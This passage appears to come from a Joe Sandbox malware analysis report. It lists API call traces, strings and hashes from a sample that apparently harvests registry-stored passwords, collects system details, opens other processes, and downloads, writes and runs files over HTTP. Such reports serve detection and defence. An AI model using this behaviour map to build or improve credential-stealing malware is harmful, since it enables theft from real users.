                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3532888709-1526165396
                              • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                              • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                              • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                              • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                              APIs
                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                              • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                              • StrCmpCA.SHLWAPI(?,00740FA8), ref: 00406147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                              • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                              • InternetCloseHandle.WININET(a+A), ref: 00406253
                              • InternetCloseHandle.WININET(00000000), ref: 00406260
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID: a+A$a+A
                              • API String ID: 4287319946-2847607090
                              • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                              • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                              • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                              • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                              APIs
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                              • memset.MSVCRT ref: 022F0E83
                              • lstrcat.KERNEL32(?,00000000), ref: 022F0E9C
                              • lstrcat.KERNEL32(?,00420D7C), ref: 022F0EAE
                              • lstrcat.KERNEL32(?,00000000), ref: 022F0EC4
                              • lstrcat.KERNEL32(?,00420D80), ref: 022F0ED6
                              • lstrcat.KERNEL32(?,00000000), ref: 022F0EEF
                              • lstrcat.KERNEL32(?,00420D84), ref: 022F0F01
                              • lstrlen.KERNEL32(?), ref: 022F0F0E
                              • memset.MSVCRT ref: 022F0F34
                              • memset.MSVCRT ref: 022F0F48
                                • Part of subcall function 022FAA87: lstrlen.KERNEL32(022E516C,?,?,022E516C,00420DDE), ref: 022FAA92
                                • Part of subcall function 022FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022FAAEC
                                • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022F8DED
                                • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                • Part of subcall function 022F9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,022F0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 022F9948
                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 022F0FC1
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 022F0FCD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                              • String ID:
                              • API String ID: 1395395982-0
                              • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                              • Instruction ID: da5286b6c1f4342075c09c9871d0a00fb238edcb978981ae55dbee23abb1ddda
                              • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                              • Instruction Fuzzy Hash: E081C4B5960318ABCB54EBE0CD51FEDB33AAF54304F0041B8A30A66185EF746B88CF59
                              APIs
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                              • memset.MSVCRT ref: 022F0E83
                              • lstrcat.KERNEL32(?,00000000), ref: 022F0E9C
                              • lstrcat.KERNEL32(?,00420D7C), ref: 022F0EAE
                              • lstrcat.KERNEL32(?,00000000), ref: 022F0EC4
                              • lstrcat.KERNEL32(?,00420D80), ref: 022F0ED6
                              • lstrcat.KERNEL32(?,00000000), ref: 022F0EEF
                              • lstrcat.KERNEL32(?,00420D84), ref: 022F0F01
                              • lstrlen.KERNEL32(?), ref: 022F0F0E
                              • memset.MSVCRT ref: 022F0F34
                              • memset.MSVCRT ref: 022F0F48
                                • Part of subcall function 022FAA87: lstrlen.KERNEL32(022E516C,?,?,022E516C,00420DDE), ref: 022FAA92
                                • Part of subcall function 022FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022FAAEC
                                • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022F8DED
                                • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                • Part of subcall function 022F9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,022F0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 022F9948
                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 022F0FC1
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 022F0FCD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                              • String ID:
                              • API String ID: 1395395982-0
                              • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                              • Instruction ID: ac176967de5fb3867c6909c9e6af5ed693eddf65447b3a085c33d8ad4c29ab4d
                              • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                              • Instruction Fuzzy Hash: 0061C2B5520318ABCB14EBE0CD55FEDB33AAF54304F0041A9E70A66085EF746B88CF59
                              APIs
                                • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A51
                                • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A68
                                • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A7F
                                • Part of subcall function 022E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022E4AA0
                                • Part of subcall function 022E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022E4AB0
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 022E4B7C
                              • StrCmpCA.SHLWAPI(?,0064A480), ref: 022E4BA1
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022E4D21
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 022E504F
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 022E506B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 022E507F
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 022E50B0
                              • InternetCloseHandle.WININET(00000000), ref: 022E5114
                              • InternetCloseHandle.WININET(00000000), ref: 022E512C
                              • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022E4D7C
                                • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                              • InternetCloseHandle.WININET(00000000), ref: 022E5136
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID:
                              • API String ID: 2402878923-0
                              • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                              • Instruction ID: 428fb1100e1cadadf9836ee14c8428e5761dbd7bdab5e8ca480bdcbb685a5d21
                              • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                              • Instruction Fuzzy Hash: B4120172920318AADB55EBD4DD61FEEF37ABF24700F5041A9A20A62194DF742F88CF51
                              APIs
                                • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A51
                                • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A68
                                • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A7F
                                • Part of subcall function 022E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022E4AA0
                                • Part of subcall function 022E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022E4AB0
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                              • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 022E6548
                              • StrCmpCA.SHLWAPI(?,0064A480), ref: 022E656A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022E659C
                              • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022E65EC
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022E6626
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022E6638
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 022E6664
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 022E66D4
                              • InternetCloseHandle.WININET(00000000), ref: 022E6756
                              • InternetCloseHandle.WININET(00000000), ref: 022E6760
                              • InternetCloseHandle.WININET(00000000), ref: 022E676A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID:
                              • API String ID: 3074848878-0
                              • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                              • Instruction ID: 16035b640c0b77a34e830471f83ccd06d1a59b4b07deb65ff81c87adbe2a1765
                              • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                              • Instruction Fuzzy Hash: E1718175A60318ABDF24DFE0CC55BEEB779FB04700F5041A9E20A6B194DBB46A84CF41
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 022F92D3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID:
                              • API String ID: 2244384528-0
                              • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                              • Instruction ID: b0434be742c0746a594443f5d8fea33a4f3366bf1a05af96f231236494e43c4f
                              • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                              • Instruction Fuzzy Hash: 5271FBB9A50208ABDB14DFE4DC94FEEB7BAFF49700F108118F605A7294DB74A944CB61
                              APIs
                              • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                              • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                              • memset.MSVCRT ref: 0041716A
                              • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                              Strings
                              • sA, xrefs: 004172AE, 00417179, 0041717C
                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                              • sA, xrefs: 00417111
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: OpenProcesslstrcpymemset
                              • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                              • API String ID: 224852652-2614523144
                              • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                              • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                              • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                              • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 022F77A9
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 022F77E6
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022F786A
                              • RtlAllocateHeap.NTDLL(00000000), ref: 022F7871
                              • wsprintfA.USER32 ref: 022F78A7
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\$B
                              • API String ID: 1544550907-183544611
                              • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                              • Instruction ID: 6f845194738d481f2f77a7ac568bb1bcdfb6103f691d242acdd6c4b18408c96a
                              • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                              • Instruction Fuzzy Hash: 42416EB1D50258AFDB10DFD4CC55BEEFBB9AF48700F0001A9E609A7284D7756A84CFA5
                              APIs
                                • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                              • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                              • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                              • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                              • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                              • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                              • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                              • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                              • task.LIBCPMTD ref: 004076FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: :
                              • API String ID: 3191641157-3653984579
                              • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                              • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                              • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                              • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                              APIs
                              • lstrcpy.KERNEL32(?,?), ref: 022F1642
                                • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                                • Part of subcall function 022F94C7: StrStrA.SHLWAPI(?,?), ref: 022F94D3
                              • lstrcpy.KERNEL32(?,00000000), ref: 022F167E
                                • Part of subcall function 022F94C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 022F94F7
                                • Part of subcall function 022F94C7: lstrlen.KERNEL32(?), ref: 022F950E
                                • Part of subcall function 022F94C7: wsprintfA.USER32 ref: 022F952E
                              • lstrcpy.KERNEL32(?,00000000), ref: 022F16C6
                              • lstrcpy.KERNEL32(?,00000000), ref: 022F170E
                              • lstrcpy.KERNEL32(?,00000000), ref: 022F1755
                              • lstrcpy.KERNEL32(?,00000000), ref: 022F179D
                              • lstrcpy.KERNEL32(?,00000000), ref: 022F17E5
                              • lstrcpy.KERNEL32(?,00000000), ref: 022F182C
                              • lstrcpy.KERNEL32(?,00000000), ref: 022F1874
                                • Part of subcall function 022FAA87: lstrlen.KERNEL32(022E516C,?,?,022E516C,00420DDE), ref: 022FAA92
                                • Part of subcall function 022FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022FAAEC
                              • strtok_s.MSVCRT ref: 022F19B7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                              • String ID:
                              • API String ID: 4276352425-0
                              • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                              • Instruction ID: 18389550f3c9e082d2bd29bee8bc349f5229a06e593f3e1caf754dbf6cc559f3
                              • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                              • Instruction Fuzzy Hash: DE719BB6960318ABCB54EBF0DD88EEEB37A6F55300F0045ACE20DA2144EE755B84CF61
                              APIs
                                • Part of subcall function 022FAA87: lstrlen.KERNEL32(022E516C,?,?,022E516C,00420DDE), ref: 022FAA92
                                • Part of subcall function 022FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022FAAEC
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                              • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 022F58AB
                              • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 022F5908
                              • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 022F5ABE
                                • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                • Part of subcall function 022F5457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 022F548F
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                • Part of subcall function 022F5527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 022F557F
                                • Part of subcall function 022F5527: lstrlen.KERNEL32(00000000), ref: 022F5596
                                • Part of subcall function 022F5527: StrStrA.SHLWAPI(00000000,00000000), ref: 022F55CB
                                • Part of subcall function 022F5527: lstrlen.KERNEL32(00000000), ref: 022F55EA
                                • Part of subcall function 022F5527: strtok.MSVCRT(00000000,?), ref: 022F5605
                                • Part of subcall function 022F5527: lstrlen.KERNEL32(00000000), ref: 022F5615
                              • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 022F59F2
                              • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 022F5BA7
                              • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 022F5C73
                              • Sleep.KERNEL32(0000EA60), ref: 022F5C82
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleepstrtok
                              • String ID: cp
                              • API String ID: 3630751533-4209302980
                              • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                              • Instruction ID: 688620f2968f751a2717c213b2df6fcde1427aaefe87c9250c7e18e4c4253aae
                              • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                              • Instruction Fuzzy Hash: 0DE11071920304AACB58FBE0DD96DEDF37AAF55700F808178A60A66198EF345B5CCF91
                              APIs
                              • memset.MSVCRT ref: 00407314
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                              • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                              • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                              • task.LIBCPMTD ref: 00407555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
